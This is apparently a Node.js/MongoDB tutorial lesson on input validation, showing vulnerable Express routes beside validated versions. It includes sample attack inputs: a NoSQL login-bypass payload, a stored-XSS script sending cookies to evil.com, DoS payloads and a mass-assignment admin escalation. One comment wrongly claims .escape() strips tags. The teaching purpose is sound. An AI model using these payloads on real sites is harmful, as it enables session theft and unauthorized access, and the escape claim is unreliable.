Episode 3 — NodeJS MongoDB Backend Architecture / 3.10 — Input Validation

3.10.a — Why Validation Matters

Input validation is the practice of checking data against expected formats, types, and constraints before processing. It protects data integrity, prevents security vulnerabilities, and improves user experience.

< README | 3.10.b — Express Validator >

1. What Is Input Validation?

Validation is the process of verifying that incoming data meets your application's expectations before it enters your business logic or database.

User Input --> [VALIDATION LAYER] --> Business Logic --> Database
                   |
                   v
              Reject bad data
              with clear errors

Every piece of data that crosses a trust boundary must be validated:

HTTP request bodies (POST/PUT data)
URL parameters (/users/:id)
Query strings (?page=1&limit=10)
HTTP headers (authorization tokens, content types)
File uploads (type, size, name)
Data from external APIs or services

2. Data Integrity

Without validation, your database fills with inconsistent, malformed data that breaks downstream systems.

What Goes Wrong

// No validation — anything goes into the database
app.post('/users', async (req, res) => {
  const user = await User.create(req.body);
  res.json(user);
});

// These all succeed — and they should NOT:
// { email: "not-an-email", age: -5, name: "" }
// { email: 123, age: "old", name: null }
// { unexpectedField: "malicious data" }

Real Consequences

Problem	Example	Impact
Wrong type	`age: "twenty"` instead of `age: 20`	Calculations break, sorting fails
Missing required fields	No email on a user record	Cannot send notifications, login fails
Out-of-range values	`quantity: -50` on an order	Inventory goes negative, financial errors
Malformed references	`userId: "abc"` instead of valid ObjectId	Broken joins, orphaned records
Duplicate entries	Two accounts with same email	Auth confusion, data leaks

3. Security Threats Without Validation

3.1 SQL/NoSQL Injection

// Without validation — MongoDB injection
app.post('/login', async (req, res) => {
  const { username, password } = req.body;
  
  // Attacker sends: { username: { "$gt": "" }, password: { "$gt": "" } }
  // This query matches ANY document where username and password exist
  const user = await User.findOne({ username, password });
  // Attacker is logged in as the first user in the collection
});

// With validation — injection blocked
app.post('/login',
  body('username').isString().trim().isLength({ min: 3, max: 30 }),
  body('password').isString().isLength({ min: 8 }),
  async (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
    
    // username and password are guaranteed to be strings now
    const user = await User.findOne({ 
      username: req.body.username 
    });
    const isMatch = await bcrypt.compare(req.body.password, user.password);
  }
);

3.2 Cross-Site Scripting (XSS)

// Without validation — stored XSS
app.post('/comments', async (req, res) => {
  // Attacker sends: { text: "<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>" }
  const comment = await Comment.create({ text: req.body.text });
  // When other users view this comment, the script executes in their browser
});

// With sanitization — XSS blocked
const { body } = require('express-validator');

app.post('/comments',
  body('text').trim().escape().isLength({ min: 1, max: 5000 }),
  async (req, res) => {
    // .escape() converts < > & " ' to HTML entities
    // "<script>" becomes "&lt;script&gt;"
  }
);

3.3 Denial of Service (DoS)

// Without validation — DoS via payload size
app.post('/search', async (req, res) => {
  // Attacker sends: { query: "a".repeat(10_000_000) }
  // Or: { items: Array(1_000_000).fill("data") }
  // Server runs out of memory processing this
  const results = await Product.find({ name: new RegExp(req.body.query) });
});

// With validation — payload constrained
app.post('/search',
  body('query').isString().isLength({ min: 1, max: 200 }),
  body('items').optional().isArray({ max: 100 }),
  // Server rejects oversized payloads immediately
);

4. Server-Side vs Client-Side Validation

                  CLIENT-SIDE                          SERVER-SIDE
            ┌─────────────────────┐            ┌─────────────────────────┐
            │  Quick feedback     │            │  Security enforcement   │
            │  Reduces requests   │            │  Data integrity         │
            │  Better UX          │            │  Cannot be bypassed     │
            │  CAN be bypassed    │            │  Canonical source       │
            └─────────────────────┘            └─────────────────────────┘
                     │                                    │
                     └──────────── BOTH ARE NEEDED ───────┘

Aspect	Client-Side	Server-Side
Purpose	UX improvement	Security enforcement
Can be bypassed?	Yes (DevTools, curl, Postman)	No
Feedback speed	Instant	Requires round-trip
Where it runs	Browser (JavaScript)	Server (Node.js)
Required?	Nice to have	Absolutely mandatory

Why Client-Side Alone Is Never Enough

# Anyone can bypass client-side validation with curl:
curl -X POST http://localhost:3000/api/users \
  -H "Content-Type: application/json" \
  -d '{"email": "not-valid", "age": -999, "role": "admin"}'

# Or with browser DevTools:
# 1. Open Network tab
# 2. Edit and resend any request
# 3. All client-side validation is bypassed

5. Defense in Depth

Validate at every boundary, not just one layer:

┌──────────────────────────────────────────────────────────┐
│  Layer 1: Client-Side Validation (HTML5 + JavaScript)    │
│  ┌────────────────────────────────────────────────────┐  │
│  │  Layer 2: API Gateway / Rate Limiting              │  │
│  │  ┌──────────────────────────────────────────────┐  │  │
│  │  │  Layer 3: Express Middleware Validation       │  │  │
│  │  │  ┌────────────────────────────────────────┐  │  │  │
│  │  │  │  Layer 4: Mongoose Schema Validation   │  │  │  │
│  │  │  │  ┌──────────────────────────────────┐  │  │  │  │
│  │  │  │  │  Layer 5: MongoDB Schema Rules   │  │  │  │  │
│  │  │  │  └──────────────────────────────────┘  │  │  │  │
│  │  │  └────────────────────────────────────────┘  │  │  │
│  │  └──────────────────────────────────────────────┘  │  │
│  └────────────────────────────────────────────────────┘  │
└──────────────────────────────────────────────────────────┘

// Layer 3: Express middleware validation
const validateRegistration = [
  body('email').isEmail().normalizeEmail(),
  body('password').isStrongPassword(),
  body('age').isInt({ min: 13, max: 120 }),
];

// Layer 4: Mongoose schema validation
const userSchema = new mongoose.Schema({
  email: {
    type: String,
    required: [true, 'Email is required'],
    match: [/^\S+@\S+\.\S+$/, 'Invalid email format'],
    unique: true,
    lowercase: true,
    trim: true,
  },
  password: {
    type: String,
    required: [true, 'Password is required'],
    minlength: [8, 'Password must be at least 8 characters'],
  },
  age: {
    type: Number,
    min: [13, 'Must be at least 13 years old'],
    max: [120, 'Invalid age'],
  },
});

6. Validation vs Sanitization

These are related but distinct operations:

Concept	Purpose	Example
Validation	Check if data meets rules — accept or reject	Is `"hello@email.com"` a valid email?
Sanitization	Transform data to be safe/clean	Trim whitespace, escape HTML, normalize email

const { body } = require('express-validator');

app.post('/profile',
  // VALIDATION — reject if rules not met
  body('email').isEmail(),                      // Must be valid email
  body('age').isInt({ min: 0, max: 150 }),      // Must be integer 0-150
  body('website').optional().isURL(),           // If present, must be URL

  // SANITIZATION — transform the data
  body('email').normalizeEmail(),               // "John@GMAIL.COM" -> "john@gmail.com"
  body('name').trim().escape(),                 // "  <b>John</b>  " -> "John"
  body('age').toInt(),                          // "25" -> 25
);

Order Matters

// WRONG: sanitize before validate — may hide invalid input
body('age').toInt().isInt({ min: 0 });
// "abc" -> NaN -> fails isInt (works here by luck)
// But: "12abc" -> 12 -> passes isInt (BAD — original input was invalid)

// RIGHT: validate first, then sanitize
body('age').isInt({ min: 0 }).toInt();
// "12abc" -> fails isInt immediately (GOOD)
// "12" -> passes isInt -> converted to number 12

7. Real-World Validation Failures

Case 1: Mass Assignment Vulnerability

// Dangerous: accepting entire req.body
app.put('/users/:id', async (req, res) => {
  await User.findByIdAndUpdate(req.params.id, req.body);
  // Attacker sends: { role: "admin", verified: true }
  // They just elevated their own privileges
});

// Safe: validate and whitelist fields
app.put('/users/:id',
  body('name').optional().isString().trim().isLength({ max: 100 }),
  body('bio').optional().isString().trim().isLength({ max: 500 }),
  async (req, res) => {
    const { name, bio } = req.body; // Only extract allowed fields
    await User.findByIdAndUpdate(req.params.id, { name, bio });
  }
);

Case 2: Type Coercion Bugs

// JavaScript type coercion creates unexpected behavior
"5" > "12"   // true (string comparison: "5" > "1")
"5" > 12     // false (number comparison: 5 > 12)

// Without validation, query parameters are always strings
app.get('/products', async (req, res) => {
  // req.query.minPrice is "5" (string), not 5 (number)
  // MongoDB comparison with string vs number fields may give wrong results
  const products = await Product.find({ price: { $gte: req.query.minPrice } });
});

Key Takeaways

Never trust user input — validate everything that crosses a trust boundary
Server-side validation is mandatory — client-side validation is only for UX
Validate AND sanitize — validation rejects bad data, sanitization cleans good data
Defense in depth — validate at every layer (middleware, schema, database)
Whitelist fields — never pass raw req.body to database operations
Security threats — injection, XSS, and DoS attacks all exploit missing validation

Explain-It Challenge

Imagine you are building a public API for a banking application. A junior developer suggests that since the mobile app validates all inputs before sending requests, server-side validation is unnecessary. Explain in detail why this reasoning is flawed, what specific attacks could exploit this gap, and design a multi-layer validation strategy for a money transfer endpoint (POST /transfer with recipientId, amount, and note fields).